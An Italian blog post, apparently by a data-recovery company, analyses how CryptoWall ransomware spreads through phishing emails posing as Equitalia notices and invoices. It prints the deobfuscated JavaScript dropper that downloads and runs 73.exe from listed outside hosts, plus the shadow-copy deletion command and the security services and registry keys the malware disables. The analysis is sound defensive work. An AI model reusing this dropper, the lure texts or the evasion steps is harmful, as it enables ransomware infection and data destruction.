Virus CryptoWall come funziona il ransomware e come attacca i computer

I computer attaccati dal Virusl CryptoWall o Cryptolocker sono moltissimi i tutto il mondo, e la cosa imbarazzante è che è possibile trovare migliaia di forum di post sui blog con inutili informazioni scopiazzate senza alcuno che abbia perfezionato uno studio serio su questa piaga informatica, ma molto più grave è che nessuno sembra capire profondamente il significato di questo tipo di attacco nè viene intrapresa alcuna azione nè da enti governativi nè dai providers.

Come funziona il Virus Cryptolocker

Cryptolocker è un eseguibile, lanciato sul computer vittima con notevoli caratteristiche di protezione anti disassemblaggio e anti rilevazione che in un modo molto astuto, crypta i nostri files con una chiave molto forte ( attualmente sembra andare di moda RSA 2048 ) le informazioni contenute ni files considerati di "valore"per poi chiedere il riscatto ( RANSOM ) a pagamento per riavere i propri files.

Come si diffonde

Nella maggior parte dei casi il virus si propaga utilizzando messaggi di posta elettronica più o meno "intelligenti", come fattura, immagine o come accade in questi giorni spacciandosi per una comunicazione di equitalia molto ben costruita, diversa dal solito phishing di fattura grossolana.
Questo significa prima di tutto che componenti di questa organizzazione criminale sono italiani, e noi abbiamo anche trovato su quale server, ma lo vedremo più tardi
 

Esempio Lettera Equitalia

Agente della Risossione
Equitalia S.p.A.
Via Cristoforo Colombo 269 - 00117 - Roma

Art. 30 D.P.R. 21/05/1972, n. 202 e successive modifiche - Art. 30 D.P.R. 21/05/1972, n. 600, Art. 190 c.p.c.

Gentile Sig./Sig.ra,

Il suindicato Agente della Riscossione avvisa, ai sensi delle intestate disposizioni di legge , di aver depositato in data odierna, nella Casa Comunale del Comune il seguente avviso di pagamento "Documento n.00020405064" del 05/12/2015 , composto da 2 pagina/e di elenchi contribuenti a nr. 12 atti.

SCARICA IL DOCUMENTO ALLEGATO

Š Equitalia S.p.A. C.F. P.I. 08704541005

Esempio Email Copia della Fattura con allegato Fattura.zip

FROM:  Sofia Baritono
TO: 
Data: 06 11 2015 19:33:00
Subject: Copia della fattura

Come Vengono inviate le email infette

Le email con il virus, molto spesso provengono da indirizzi "reali" a volte da nostri stessi interlocutori e sono molto "credibili", questo perchè i nostri amici pirati che inviano le email con il virus hanno acquistato milioni di indirizzi email validi, direttamente nell botnet degli hackers, quindi è addirittura facile imbattersi in un mittente conosciuto.

Cosa contengono le email infette

Il ransomware cryptowall o cryptolocker non puo' diffondersi nativamente come .exe, in quanto i providers di posta lo identificherebbero, anche se contenuto in uno zip, per cui hanno pensato un sistema molto più articolato ed astuto.
Nel File fattura.zip per esempio spesso viene inserito un piccolo file javascript, linguaggio utilizzato dal nostro browser camuffato da pdf o da doc.
Il contenuto puo' avere delle piccole differenze, ma nella sostanza una funzione ricorsiva offuscata e maliziosa genera una stringa con il vero codice

Esempio del contenuto del file fattura.pdf.js

var stringa;

function F(YuesnpFPlX,sIqefaiTYA,iKJZjGxUCz)
{
    stringa = stringa + String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz);
    return String.fromCharCode(YuesnpFPlX)+String.fromCharCode(sIqefaiTYA)+String.fromCharCode(iKJZjGxUCz)
}

Attenzione alla chiamata Eval

La chiamata eval genera da un flusso complesso e apparentemente illeggibile il codice di secondo livello

eval(F(13,10,13)+F(10,118,97)+F(114,32,98)+F(32,61,32)+F(34,53,46)+F(51,57,46) + Molto altro codice dissimulatorio)

Risultato della trascodifica del Virus

Stringa delimitata con le URL del virus (73.exe in questo caso)

var b = "5.39.222.196/73.exe? bereanbibledenver.com/wp-admin/js/73.exe? bellychef.com/wp-includes/theme-compat/73.exe?".split(" ");

Con questo sistema il virus prova ad evitare eventuali rilevazioni del codice "malizioso"

var sdf =((1/*s147442280596n422484uM354193eOiZ*/)?"WScri":"")+"pt.Shell";

Qui è stata occultata la chiamata essenziale per lanciare il virus come eseguibile

var ws = WScript.CreateObject(sdf);
var fd = "%TEMP%";

Qui viene identificata la cartella di windows temporanea

var fn = ws.ExpandEnvironmentStrings(fd);

var bim = "2.XMLH";

var poh = bim + "TTP";

Qui viene cyptolocker occulta la chiamata http

var as = true  , sdfs = "ADOD";
var xo = WScript.CreateObject("MS"+"XML"+(261764, poh));
var xa = WScript.CreateObject(sdfs + "B.St"+(498822, "ream"));
var ld = 0;
var n = 1;

for (var i=ld; i

{

  var dn = 0;

  try  {

    poi = "GET";  

    Qui viene cyptolocker prova tutti gli indirizzi disponibili per il download del virus

    xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100)  {

      xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000)  {

        dn = 1; xa.position = 0; xa.saveToFile/*d813530s*/(fn/*d41380s*/+n+".exe",4-2); try  {

          if (((new Date())>0,7327516888))

         {
            ws./*d608145s*/Run(fn+n+/*d246178s*/".exe",/*d104822s*/3-2,0);
            break;
          }
        }

        catch (er)  {

        };

      }; xa.close();

    };

    if (dn == 1)  {

      ld = i; break;

    };

  }

  catch (er)  {

  };

};

Cosa abbiamo notato nel comportamento del file fattura e del sistema di diffusione di Cryptowall

Prima di ogni cosa, i pirati che hanno prodotto il virus sono molto astuti e cambiano continuamente server e metodo di offuscamento delle url da dove il virus verrà scaricato.
I siti web che ospitano il virus, sono distruibuiti in tutto il mondo ed anche in italia.
Abbiamo notato che molti di questi siti vengono posizionati su providers e server in lingua araba, russa o posizionati a PANAMA per esempio.

Fanno parte dell'organizzazione anche Server Italiani

Durante le nostre analisi abbiamo trovato un redirect del virus anche su server italiani, nello specifico in Sardegna.
Non facciamo menzione del provider nè dei domini interessati, in quanto molto pericoloso e dobbiamo considerare l'ipotesi che il proprietario di un dominio attaccato potrebbe sempre essere inconsapevole, e quindi il pirata potrebbe essere il webmaster o qualcuno operante sui server del provider stesso, oltre che sarebbe opportuno considerare un eventuale attacco sul dominio in oggetto ( anche se l'ipotesi di hacking viene considerata remota ) .

Come funziona il Virus CryptoLocker

Una volta che l'eseguibile del virus è stato trasferito sul vostro computer il funzionamento del virus è molto veloce ed incisivo.
Il Virusl CryptoWall prima di iniziare il lavoro prepara con cura il proprio ambiente di utilizzo, creando un nuovo processo explorer sospeso ed inserisce codice malizioso nel processo stesso.
Crea dunque un nuovo thread remoto ed esegue la chiamata NtResumeThread
Il virus Perfeziona il downgrade del sistema di sicurezza di Windows ed esegue la patch su RtlQueryElevationFlags.

Cancellazione delle copie Shadow di Windows

Se ancora trovate qualche blogger improvvisato che nel proprio copia / incolla suggerisce di provare a recuperare i dati utilizzando le copie shadow, sappiate che CrytoWall prima di qualsiasi altra operazione le elimina con la chiamata WinExec( vssadmin.exe Delete Shadows /All /Quiet )

Disabilitazione dei seguenti servizi di sicurezza di Windows

Disabilitando questi servizi CryptoWall è certo di poter operare con tranquillità senza problemi, il Vostro sistema Windows adesso è completamente indifeso.

1. Wscsvc
2. WinDefend
3. Wuauserv
4. BITS
5. ERSvc
6. WerSvc

Cancellazione delle chavi di registro di Windows Defender

Il virus elimina la chiave per lo startup di Defender alla partenza del computer
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run.Windows Defender

Il virus elimina la chiave di registro per le notifiche di sicurezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellServiceObjects/{FD6905CE-952F-41F1-9A6F-135D9C6622CC}

e disabilita il ripristino di Windows per chiudere in bellezza
HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/SystemRestore.DisableSR = 1 

Il Virus CryptoWall è pronto a partire e a prendere in ostaggio i Vostri Dati

Nel prossimo post sul nostro blog vedremo come il Virus eseguirà il codice proncipale del proprio funzionamento, la cifratura dei Vostri Dati

Per qualsiasi informazione scriveteci virus@recoveritalia.it